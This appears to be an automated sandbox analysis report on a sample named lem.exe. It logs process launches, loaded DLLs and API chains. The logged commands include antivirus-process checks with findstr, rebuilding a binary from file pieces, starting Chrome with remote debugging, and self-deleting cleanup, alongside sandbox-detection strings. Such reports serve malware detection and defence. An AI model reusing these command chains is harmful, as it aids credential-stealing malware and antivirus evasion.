File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\lem.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: O8GVASR9H.10.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: lem.exe

ReversingLabs: Detection: 15%

Source: C:\Users\user\Desktop\lem.exe

File read: C:\Users\user\Desktop\lem.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\lem.exe "C:\Users\user\Desktop\lem.exe"
Source: C:\Users\user\Desktop\lem.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Cheats Cheats.cmd && Cheats.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 628056
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Cleared" Penalties
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Participating + ..\Produced + ..\Tvs + ..\Contractor + ..\Legislative u
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\628056\Corrections.com Corrections.com u
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Windows\SysWOW64\tasklist.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2416 --field-trial-handle=2136,i,3268982340233252329,5354050458271203649,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\628056\Corrections.com" & rd /s /q "C:\ProgramData\2N7Y58YCJW47" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\Desktop\lem.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Cheats Cheats.cmd && Cheats.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 628056	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Cleared" Penalties	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Participating + ..\Produced + ..\Tvs + ..\Contractor + ..\Legislative u	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\628056\Corrections.com Corrections.com u	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\628056\Corrections.com" & rd /s /q "C:\ProgramData\2N7Y58YCJW47" & exit	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2416 --field-trial-handle=2136,i,3268982340233252329,5354050458271203649,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10	Jump to behavior

Source: C:\Users\user\Desktop\lem.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\lem.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\lem.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\lem.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\lem.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\lem.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\lem.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\lem.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\lem.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\lem.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\lem.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\lem.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\lem.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\lem.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\lem.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\lem.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\lem.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\lem.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\lem.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\lem.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\lem.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\lem.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\lem.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\lem.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\lem.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\lem.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\lem.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\lem.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\lem.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\lem.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\lem.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\lem.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\lem.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\lem.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll	Jump to behavior

Source: C:\Users\user\Desktop\lem.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: lem.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: cryptosetup.pdbGCTL source: Corrections.com, 0000000A.00000002.2820141571.00000000045B4000.00000004.00000800.00020000.00000000.sdmp, TR9Z5X.10.dr
Source:	Binary string: cryptosetup.pdb source: Corrections.com, 0000000A.00000002.2820141571.00000000045B4000.00000004.00000800.00020000.00000000.sdmp, TR9Z5X.10.dr

Source: C:\Users\user\Desktop\lem.exe

Code function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00406328

Source: lem.exe

Static PE information: real checksum: 0xee8db should be: 0xefc4d

Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com

Code function: 10_2_00940DE6 push ecx; ret

10_2_00940DF9

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Temp\628056\Corrections.com

Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\628056\Corrections.com			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	File created: C:\ProgramData\2N7Y58YCJW47\TR9Z5X			Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com

File created: C:\ProgramData\2N7Y58YCJW47\TR9Z5X

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com

File created: C:\ProgramData\2N7Y58YCJW47\TR9Z5X

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Code function: 10_2_009B26DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		10_2_009B26DD
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Code function: 10_2_0093FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		10_2_0093FC7C

Source: C:\Users\user\Desktop\lem.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lem.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lem.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lem.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lem.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lem.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lem.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lem.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lem.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lem.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lem.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lem.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com

Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

graph_10-104136

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Corrections.com, 0000000A.00000002.2823074845.0000000004BE1000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: ABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/%HSWPESPY.DLLAVGHOOKX.DLLSBIEDLL.DLLSNXHK.DLLVMCHECK.DLLDIR_WATCH.DLLAPI_LOG.DLLPSTOREC.DLLAVGHOOKA.DLLCMDVRT64.DLLCMDVRT32.DLLIMAGE/JPEGCHAININGMODEAESCHAININGMODEGCMABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=UNKNOWN EXCEPTIONBAD ALLOCATION
Source: Corrections.com, 0000000A.00000003.1925513732.0000000004431000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: BABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/%HSWPESPY.DLLAVGHOOKX.DLLSBIEDLL.DLLSNXHK.DLLVMCHECK.DLLDIR_WATCH.DLLAPI_LOG.DLLPSTOREC.DLLAVGHOOKA.DLLCMDVRT64.DLLCMDVRT32.DLLIMAGE/JPEGCHAININGMODEAESCHAININGMODEGCMABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=UNKNOWN EXCEPTIONBAD ALLOCATION

Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com

Dropped PE file which has not been started: C:\ProgramData\2N7Y58YCJW47\TR9Z5X

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com

API coverage: 3.7 %

Source: C:\Windows\SysWOW64\timeout.exe TID: 7136

Thread sleep count: 86 > 30

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\lem.exe	Code function: 0_2_00406301 FindFirstFileW,FindClose,	0_2_00406301
Source: C:\Users\user\Desktop\lem.exe	Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00406CC7
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Code function: 10_2_0098DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	10_2_0098DC54
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Code function: 10_2_0099A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	10_2_0099A087
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Code function: 10_2_0099A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	10_2_0099A1E2
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Code function: 10_2_0098E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	10_2_0098E472
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Code function: 10_2_0099A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,	10_2_0099A570
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Code function: 10_2_009966DC FindFirstFileW,FindNextFileW,FindClose,	10_2_009966DC
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Code function: 10_2_0095C622 FindFirstFileExW,	10_2_0095C622
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Code function: 10_2_009973D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	10_2_009973D4
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Code function: 10_2_00997333 FindFirstFileW,FindClose,	10_2_00997333
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Code function: 10_2_0098D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	10_2_0098D921

Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com

